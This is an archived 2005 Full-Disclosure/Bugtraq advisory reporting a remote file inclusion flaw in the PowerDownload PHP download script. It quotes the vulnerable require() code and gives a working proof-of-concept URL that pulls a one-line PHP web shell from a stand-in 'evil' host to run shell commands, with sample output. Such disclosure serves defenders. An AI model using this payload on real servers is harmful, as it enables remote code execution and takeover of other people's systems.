| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 31 May 2005 00:05:34 -0300 From: SoulBlack Group <soulblacktm@...il.com> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, news@...uriteam.com, sec@...lblack.com.ar, bugs@...uritytracker.com, submissions@...ketstormsecurity.org, vuln@...unia.com, alerts_advisories@...-security.org Subject: PowerDownload Remote File Inclusion =========================================================== ============================================================ Title: PowerDownload Remote File Inclusion. Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 31/05/2005 Severity: High. Remote Users Can Execute Arbitrary Code. Affected version: v3.0.2 & v3.0.3 vendor: http://www.powerscripts.org/ ============================================================ ============================================================ * Summary * PowerDownload is a PHP and mySQL based Download Script. ------------------------------------------------------------- * Problem Description * The bug reside in $incdir var in pdl-inc/pdl_header.inc.php Vulnerable Code // Include required Files if(!isset($incdir)) $incdir = ""; require($incdir."pdl-inc/pdl_config.inc.php"); require($incdir."pdl-inc/pdl_db_class_".strtolower($config_sql_type).".inc.php"); require($incdir."pdl-inc/pdl_functions.inc.php"); /* http://server/download/downloads.php?release_id=650&incdir=http://evil/cmd.gif?&cmd=uname%20-a Linux webserver101 2.4.21-243-athlon #1 Thu Aug 12 15:24:15 UTC 2004 i686 athlon */ /* ------- cmd.gif ------- <? system($cmd); ?> */ ------------------------------------------------------------- ------------------------------------------------------------- * Fix * Contact the Vendor. ------------------------------------------------------------- * References * http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt ------------------------------------------------------------- * Credits * Vulnerability reported by SoulBlack Security Research ============================================================ -- SoulBlack - Security Research http://www.soulblack.com.ar
Powered by blists - more mailing lists